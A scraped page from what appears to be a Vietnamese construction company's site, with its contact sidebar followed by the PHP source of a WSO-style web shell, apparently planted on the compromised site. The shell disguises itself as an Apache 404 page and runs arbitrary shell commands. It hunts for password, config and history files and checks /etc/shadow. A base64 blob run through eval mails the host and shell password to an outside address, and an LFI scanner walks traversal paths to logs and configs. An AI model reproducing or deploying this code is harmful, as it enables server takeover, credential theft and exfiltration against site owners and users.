HỖ TRỢ TRỰC TUYẾN
 Tư vấn công trình:

Tư vấn 1

Tư vấn 02
 Kinh doanh:

Sales 01

Sales 02
 Hotline: 0989 072 766
0839 212 757
LIÊN KẾT WEBSITE
THỐNG KÊ TRUY CẬP
  • Online: 45
  • Số lượt truy cập: 1975112
'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '
Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80
 
    
"); } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else wsoLogin(); if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; $wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '
['.$k.']
' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . '
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "\n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionlfiscan() { wsoHeader(); print '

Led-Zeppelin\'s LFI File dumper

LFI URL: File: Null: User-Agent:
'; error_reporting(0); if($_POST['lfiurl']) { print "
"; 
         $cheader = $_POST['custom_header']; 
         $target = $_POST['lfiurl']; 
         $type = $_POST['scantype']; 
         $byte1 = $_POST['null']; 
         $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1.""; 
         $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1.""; 
         $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1.""; 
         $lfiaccess = array( 
            1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."", 
            2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."", 
            3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."", 
            4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."", 
            5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."", 
            6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."", 
            7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."", 
            8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."", 
            9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."", 
            10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."", 
            11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."", 
            12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."", 
            13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."", 
            14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."", 
            15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."", 
            16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."", 
            17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."", 
            18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."", 
            19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."", 
            20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."", 
            21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."", 
            22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."", 
            23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1.""); 
         
         $lfierror = array( 
            1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."", 
            2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."", 
            3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."", 
            4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."", 
            5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."", 
            6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."", 
            7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."", 
            8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."", 
            9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."", 
            10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."", 
            11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."", 
            12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."", 
            13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."", 
            14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."", 
            15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."", 
            16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."", 
            17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."", 
            18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."", 
            19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."", 
            20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."", 
            21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."", 
            22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."", 
            23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1.""); 
  
         $lficonfig = array( 
            1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."", 
            2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."", 
            3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."", 
            4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."", 
            5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."", 
            6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."", 
            7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."", 
            8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."", 
            9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."", 
            10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."", 
            11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."", 
            12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."", 
            13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."", 
            14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."", 
            15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."", 
            16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."", 
            17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."", 
            18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."", 
            19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."", 
            20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."", 
            21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."", 
            22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."", 
            23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."", 
            24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."", 
            25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."", 
            26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."", 
            27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."", 
            28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."", 
            29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."", 
            30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."", 
            31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."", 
            32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."", 
            33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."", 
            34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."", 
            35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1.""); 
                 
          $lfiphpini = array( 
            1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."", 
            2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."", 
            3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."", 
            4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."", 
            5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."", 
            6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."", 
            7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."", 
            8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."", 
            9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."", 
            10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."", 
            11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."", 
            12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."", 
            13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."", 
            14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."", 
            15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."", 
            16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."", 
            17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."", 
            18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."", 
            19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."", 
            20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."", 
            21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."", 
            22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."", 
            23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."", 
            24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."", 
            25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."", 
            26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."", 
            27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1.""); 
         
          $lfimysql = array( 
            1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."", 
            2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."", 
            3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."", 
            4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."", 
            5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."", 
            6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."", 
            7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."", 
            8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."", 
            9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."", 
            10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1.""); 
         
          $lfiftp = array( 
            1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."", 
            2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."", 
            3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."", 
            4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."", 
            5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."", 
            6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."", 
            7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."", 
            8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."", 
            9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."", 
            10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."", 
            11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."", 
            12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."", 
            13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."", 
            14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."", 
            15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."", 
            16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."", 
            17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."", 
            18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."", 
            19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."", 
            20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."", 
            21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."", 
            22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."", 
            23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."", 
            24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."", 
            25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."", 
            26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."", 
            27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."", 
            28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."", 
            29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."", 
            30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."", 
            31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."", 
            32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."", 
            33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."", 
            34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."", 
            35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."", 
            36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."", 
            37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."", 
            38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."", 
            39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."", 
            40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."", 
            41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."", 
            42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."", 
            43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."", 
            44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1.""); 
         
  
         $x = 1; 
         if ( $type == 1 ) { 
            $res1 = FetchURL($target.$lfitest); 
            $res2 = FetchURL($target.$lfitest2); 
            $rhash1 = md5($res1); 
            $rhash2 = md5($res2); 
            if ($rhash1 != $rhash2) { 
                print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiaccess[$x]) { $res3 = FetchURL($target.$lfiaccess[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiaccess[$x]."
"; } else { print "[!] Failed!".$target."".$lfiaccess[$x]."
"; } $x++; } } } if ( $type == 2 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lficonfig[$x]) { $res3 = FetchURL($target.$lficonfig[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lficonfig[$x]."
"; } else { print "[!] Failed!".$target."".$lficonfig[$x]."
"; } $x++; } } } if ( $type == 3 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfierror[$x]) { $res3 = FetchURL($target.$lfierror[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfierror[$x]."
"; } else { print "[!] Failed!".$target."".$lfierror[$x]."
"; } $x++; } } } if ( $type == 4 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiphpini[$x]) { $res3 = FetchURL($target.$lfiphpini[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiphpini[$x]."
"; } else { print "[!] Failed!".$target."".$lfiphpini[$x]."
"; } $x++; } } } if ( $type == 5 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfimysql[$x]) { $res3 = FetchURL($target.$lfimysql[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfimysql[$x]."
